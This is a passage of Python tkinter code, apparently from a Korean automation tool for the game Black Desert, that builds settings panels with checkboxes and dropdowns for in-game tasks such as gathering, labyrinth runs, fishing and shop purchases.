text = "초 후 항복"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='영지')
frame_inner = ttk.Frame(frame_label)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'].trace(
'w', lambda *args: self.callback_youngji_money_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '영지 지원금',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_money'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'].trace(
'w', lambda *args: self.callback_youngji_blackstone_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '블랙스톤',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_blackstone'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'].trace(
'w', lambda *args: self.callback_youngji_chuksa_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '축사',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chuksa'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'].trace(
'w', lambda *args: self.callback_youngji_tukbat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '텃밭',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'].trace(
'w', lambda *args: self.callback_youngji_tukbat_count_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count')
)
combobox_list = []
for i in range(1, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'],
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_tukbat_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개 보유"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_inner.pack(anchor=tkinter.W)
frame_inner = ttk.Frame(frame_label)
frame = ttk.Frame(frame_inner)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'].trace(
'w', lambda *args: self.callback_youngji_chejip_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '채집',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_inner)
combobox_list = LYBBlackDesert.chejip_list
place_combobox_list = LYBBlackDesert.chejip_place_list
for i in range(8):
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i)] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i)] = tkinter.StringVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_0'].trace(
'w', lambda *args: self.callback_youngji_chejip_0_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_0')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_0'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_0_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_0')
)
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_1'].trace(
'w', lambda *args: self.callback_youngji_chejip_1_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_1')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_1'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_1_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_1')
)
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_2'].trace(
'w', lambda *args: self.callback_youngji_chejip_2_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_2')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_2'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_2_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_2')
)
elif i == 3:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_3'].trace(
'w', lambda *args: self.callback_youngji_chejip_3_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_3')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_3'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_3_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_3')
)
elif i == 4:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_4'].trace(
'w', lambda *args: self.callback_youngji_chejip_4_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_4')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_4'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_4_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_4')
)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_inner)
elif i == 5:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_5'].trace(
'w', lambda *args: self.callback_youngji_chejip_5_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_5')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_5'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_5_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_5')
)
elif i == 6:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_6'].trace(
'w', lambda *args: self.callback_youngji_chejip_6_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_6')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_6'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_6_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_6')
)
elif i == 7:
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_7'].trace(
'w', lambda *args: self.callback_youngji_chejip_7_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_7')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_7'].trace(
'w', lambda *args: self.callback_youngji_chejip_place_7_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_7')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i)] = combobox_list[-1]
if not lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i)] = place_combobox_list[1]
label = ttk.Label(
master = frame,
text = str(i+1) +'. '
)
label.pack(side=tkinter.LEFT)
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i)],
state = "readonly",
height = 10,
width = 9,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
combobox = ttk.Combobox(
master = frame,
values = place_combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i)],
state = "readonly",
height = 10,
width = 6,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'youngji_chejip_place_' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_inner.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# | |
# | 작업 설정2 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['work2_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='미궁 개척')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "난이도"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'].trace(
'w', lambda *args: self.callback_migung_gecheok_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok')
)
combobox_list = []
for i in range(1, 9):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_gecheok'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 선택"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'].trace(
'w', lambda *args: self.callback_migung_friend_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '친구',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'].trace(
'w', lambda *args: self.callback_migung_friend_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number')
)
combobox_list = []
for i in range(0, 11):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_friend_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'].trace(
'w', lambda *args: self.callback_migung_guild_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '길드',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'].trace(
'w', lambda *args: self.callback_migung_guild_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number')
)
combobox_list = []
for i in range(0, 11):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'].trace(
'w', lambda *args: self.callback_migung_open_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '공개',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'].trace(
'w', lambda *args: self.callback_migung_repeat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '반복',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='미궁 목록')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "난이도"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'].trace(
'w', lambda *args: self.callback_migung_join_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join')
)
combobox_list = []
for i in range(1, 9):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 참여하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'].trace(
'w', lambda *args: self.callback_migung_join_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit')
)
combobox_list = []
for i in range(10, 601, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'] = 30
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 매칭 대기 후 재신청"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='낚시')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'].trace(
'w', lambda *args: self.callback_naksi_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit')
)
combobox_list = []
for i in range(60, 7201, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'] = 600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 동안 작업"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='말 가방에 넣기')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "옮길 아이템 갯수"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'].trace(
'w', lambda *args: self.callback_mal_bag_open_item_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit')
)
combobox_list = []
for i in range(1, 11):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='가축상점')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "일반 사료 구매 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'].trace(
'w', lambda *args: self.callback_pet_set_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'] = 100
combobox_list = [10, 50, 100]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개씩"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'].trace(
'w', lambda *args: self.callback_pet_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number')
)
if not lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'] = 2
combobox_list = []
for i in range(1, 100):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "회"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# | |
# | 토벌 게시판 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['tobeol_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'].trace(
'w', lambda *args: self.callback_tobeol_custom_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom')
)
if not lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'] = False
s = ttk.Style()
s.configure('blue_checkbutton.TCheckbutton', foreground='blue')
check_box = ttk.Checkbutton(
master = frame,
text = '개별 설정 사용',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'],
onvalue = True,
style = 'red_checkbutton.TCheckbutton',
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'].trace(
'w', lambda *args: self.callback_tobeol_auto_update_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update')
)
if not lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'] = True
s = ttk.Style()
s.configure('green_checkbutton.TCheckbutton', foreground='green')
check_box = ttk.Checkbutton(
master = frame,
text = '토벌 실패시 난이도 업데이트',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'],
onvalue = True,
style = 'green_checkbutton.TCheckbutton',
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W, padx=10)
frame_row.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_head)
frame.pack(pady=2)
frame_row_top = ttk.Frame(frame_head)
